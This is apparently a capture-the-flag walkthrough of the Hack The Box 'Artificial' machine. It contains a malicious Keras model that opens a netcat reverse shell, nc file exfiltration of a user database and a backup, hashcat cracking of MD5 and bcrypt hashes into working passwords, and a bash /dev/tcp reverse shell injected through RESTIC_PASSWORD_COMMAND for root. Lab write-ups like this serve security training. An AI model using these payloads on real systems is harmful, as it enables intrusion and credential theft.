🧑‍🎨Artificial

https://app.hackthebox.com/machines/668

Recon

change <ip>

[*] Running initial Nmap scan...
sudo nmap -sCV -T4 <ip> -oA nmap-initial
[..]
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7c:e4:8d:84:c5:de:91:3a:5a:2b:9d:34:ed:d6:99:17 (RSA)
|   256 83:46:2d:cf:73:6d:28:6f:11:d5:1d:b4:88:20:d6:7c (ECDSA)
|_  256 e3:18:2e:3b:40:61:b4:59:87:e8:4a:29:24:0f:6a:fc (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://artificial.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Example Dockerfile

FROM python:3.8-slim

WORKDIR /code

RUN apt-get update && \
    apt-get install -y curl && \
    curl -k -LO https://files.pythonhosted.org/packages/65/ad/4e090ca3b4de53404df9d1247c8a371346737862cfe539e7516fd23149a4/tensorflow_cpu-2.13.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl && \
    rm -rf /var/lib/apt/lists/*

RUN pip install ./tensorflow_cpu-2.13.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl

ENTRYPOINT ["/bin/bash"]

User

Arbitrary Code Execution Vulnerability in the tensorflow-cpu library

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26266cve.mitre.org

➜ /opt/python-3.10.0/bin/python3.10 -m venv venv
➜ source ./venv/bin/activate      
(venv) ➜ pip install -r requirements.txt                                                                   
Collecting tensorflow-cpu==2.13.1
[..]

exploit.py #change <ip>

import tensorflow as tf
import os

def exploit(x):
	import os	
	os.system("rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc <ip> 1337 >/tmp/f")
	return x

model = tf.keras.Sequential()
model.add(tf.keras.layers.Input(shape=(64,)))
model.add(tf.keras.layers.Lambda(exploit))
model.compile()
model.save("exploit.h5")

(venv) ➜ python3 exploit.py
2025-06-24 15:39:06.771071: I tensorflow/core/platform/cpu_feature_guard.cc:182] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.
To enable the following instructions: AVX2 FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.
/mnt/e/hacking/hackthebox/Season8/artificial/venv/lib/python3.10/site-packages/keras/src/engine/training.py:3000: UserWarning: You are saving your model as an HDF5 file via `model.save()`. This file format is considered legacy. We recommend using instead the native Keras format, e.g. `model.save('my_model.keras')`.
  saving_api.save_model(

Upload the model and trigger shell by clicking view predictions after setting up the listener.

➜ rlwrap nc -nlvp 1337
listening on [any] 1337 ...
connect to [VPN] from (UNKNOWN) [IP] 48596
/bin/sh: 0: can't access tty; job control turned off
$ whoami
app

Transfering the users.db from the instance folder

attacker-side

➜ nc -lp 1234 > users.db
[after sending]
➜ ll users.db 
-rw-r--r-- 1 kali kali 24K Jun 24 15:50 users.db

change <ip>

$ ls
users.db
$ nc -w 3 <ip> 1234 < users.db

1	gael	gael@artificial.htb	c99175974b6e192936d97224638a34f8
2	mark	mark@artificial.htb	0f3d8c76530022670f1c6029eed09ccb
3	robert	robert@artificial.htb	b606c5f5136170f15444251665638b36
4	royer	royer@artificial.htb	bc25b1f80f544c0ab451c02a3dca9fc6
5	mary	mary@artificial.htb	bf041041e57f1aff3be7ea1abd6129d0

➜ cat hashes 
c99175974b6e192936d97224638a34f8
0f3d8c76530022670f1c6029eed09ccb
b606c5f5136170f15444251665638b36
c25b1f80f544c0ab451c02a3dca9fc6
bf041041e57f1aff3be7ea1abd6129d0

➜ hashcat --identify hashes                                                                                
The following 11 hash-modes match the structure of your input hash:                                                   
                                                           
      # | Name                                                       | Category
  ======+============================================================+======================================
    900 | MD4                                                        | Raw Hash
      0 | MD5                                                        | Raw Hash
     70 | md5(utf16le($pass))                                        | Raw Hash
   2600 | md5(md5($pass))                                            | Raw Hash salted and/or iterated
   3500 | md5(md5(md5($pass)))                                       | Raw Hash salted and/or iterated
   4400 | md5(sha1($pass))                                           | Raw Hash salted and/or iterated
  20900 | md5(sha1($pass).md5($pass).sha1($pass))                    | Raw Hash salted and/or iterated
   4300 | md5(strtoupper(md5($pass)))                                | Raw Hash salted and/or iterated
   1000 | NTLM                                                       | Operating System
   9900 | Radmin2                                                    | Operating System
   8600 | Lotus Notes/Domino 5                                       | Enterprise Application Software (EAS)
                                                           
➜ hashcat -m 0 -a 0 hashes /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
                                                           
[...]
c99175974b6e192936d97224638a34f8:mattp005numbertwo  

➜ ssh gael@artificial.htb 
gael@artificial.htb's password: mattp005numbertwo  
Warning: No xauth data; using fake authentication data for X11 forwarding.
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Tue 24 Jun 2025 01:55:57 PM UTC

  System load:  0.11              Processes:             252
  Usage of /:   63.6% of 7.53GB   Users logged in:       1
  Memory usage: 36%               IPv4 address for eth0: ip
  Swap usage:   0%


Expanded Security Maintenance for Infrastructure is not enabled.

0 updates can be applied immediately.

Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


/usr/bin/xauth:  file /home/gael/.Xauthority does not exist
Last login: Tue Jun 24 13:55:58 2025 from VPNIP
gael@artificial:~$ ls
user.txt

Root

gael@artificial:~$ netstat -tlpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:5000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:9898          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:6010          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 ::1:6010                :::*                    LISTEN      -   

gael@artificial:~$ systemctl list-units --type=service --state=active --no-legend | awk '{print $1}' | while read svc; do
>     path=$(systemctl show -p FragmentPath --value "$svc") 
>     printf "%-50s %s\n" "$svc" "$path"
> done                      
accounts-daemon.service                            /lib/systemd/system/accounts-daemon.service
app.service                                        /etc/systemd/system/app.service
apparmor.service                                   /lib/systemd/system/apparmor.service
apport.service                                     /run/systemd/generator.late/apport.service
atd.service                                        /lib/systemd/system/atd.service
auditd.service                                     /lib/systemd/system/auditd.service
backrest.service                                   /etc/systemd/system/backrest.service
[..]
gael@artificial:~$ cat /etc/systemd/system/backrest.service
[Unit]
Description=Backrest Service
After=network.target

[Service]
Type=simple
User=root
Group=root
ExecStart=/usr/local/bin/backrest
Environment="BACKREST_PORT=127.0.0.1:9898"
Environment="BACKREST_CONFIG=/opt/backrest/.config/backrest/config.json"
Environment="BACKREST_DATA=/opt/backrest"
Environment="BACKREST_RESTIC_COMMAND=/opt/backrest/restic"

[Install]
WantedBy=multi-user.target

gael@artificial:~$ ll /var/backups/
total 51228
drwxr-xr-x  2 root root       4096 Jun  9 09:03 ./
drwxr-xr-x 13 root root       4096 Jun  2 07:38 ../
-rw-r--r--  1 root root      39386 Jun  9 09:02 apt.extended_states.0
-rw-r--r--  1 root root       4206 Jun  2 07:42 apt.extended_states.1.gz
-rw-r--r--  1 root root       4190 May 27 13:07 apt.extended_states.2.gz
-rw-r--r--  1 root root       4383 Oct 27  2024 apt.extended_states.3.gz
-rw-r--r--  1 root root       4379 Oct 19  2024 apt.extended_states.4.gz
-rw-r--r--  1 root root       4367 Oct 14  2024 apt.extended_states.5.gz
-rw-r--r--  1 root root       4356 Sep 22  2024 apt.extended_states.6.gz
-rw-r-----  1 root sysadm 52357120 Mar  4 22:19 backrest_backup.tar.gz

attacker-side

➜ artificial nc -lp 1234 > backup.tar.gz

victim-side #change <ip>

gael@artificial:~$ nc -w 3 <ip> 1234 < /var/backups/backrest_backup.tar.gz 

config.json

{
  "modno": 2,
  "version": 4,
  "instance": "Artificial",
  "auth": {
    "disabled": false,
    "users": [
      {
        "name": "backrest_root",
        "passwordBcrypt": "JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"
      }
    ]
  }
}

➜ echo 'JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP' | base64 -d | tee hash
$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR/ACMMkSsspbRutYP58EBZz/0QO%                                                         
➜ backrest hashcat --identify hash     
The following 4 hash-modes match the structure of your input hash:
                                                           
      # | Name                                                       | Category
  ======+============================================================+======================================                                                                                                                                
   3200 | bcrypt $2*$, Blowfish (Unix)                               | Operating System
  25600 | bcrypt(md5($pass)) / bcryptmd5                             | Forums, CMS, E-Commerce
  25800 | bcrypt(sha1($pass)) / bcryptsha1                           | Forums, CMS, E-Commerce
  28400 | bcrypt(sha512($pass)) / bcryptsha512                       | Forums, CMS, E-Commerce

➜ hashcat -a 0 -m 3200 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting


$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR/ACMMkSsspbRutYP58EBZz/0QO:!@#$%^
                                                          

➜ backrest ssh -L9898:127.0.0.1:9898 gael@artificial.htb
gael@artificial.htb's password: mattp005numbertwo  
Warning: No xauth data; using fake authentication data for X11 forwarding.
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Tue 24 Jun 2025 02:22:39 PM UTC

  System load:  0.11              Processes:             269
  Usage of /:   59.0% of 7.53GB   Users logged in:       2
  Memory usage: 34%               IPv4 address for eth0: IP
  Swap usage:   0%


Expanded Security Maintenance for Infrastructure is not enabled.

0 updates can be applied immediately.

Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Jun 24 14:22:40 2025 from VPN
gael@artificial:~$ 

Creating a new repo with env vars

change <ip>

RESTIC_PASSWORD_COMMAND=bash -c 'bash -i >& /dev/tcp/<ip>/1338 0>&1'

➜ sorcery rlwrap nc -nlvp 1338
listening on [any] 1338 ...
[after submitting repo]
connect to [VPN] from (UNKNOWN) [IP] 53282
bash: cannot set terminal process group (41424): Inappropriate ioctl for device
bash: no job control in this shell
root@artificial:/# whoami
whoami
root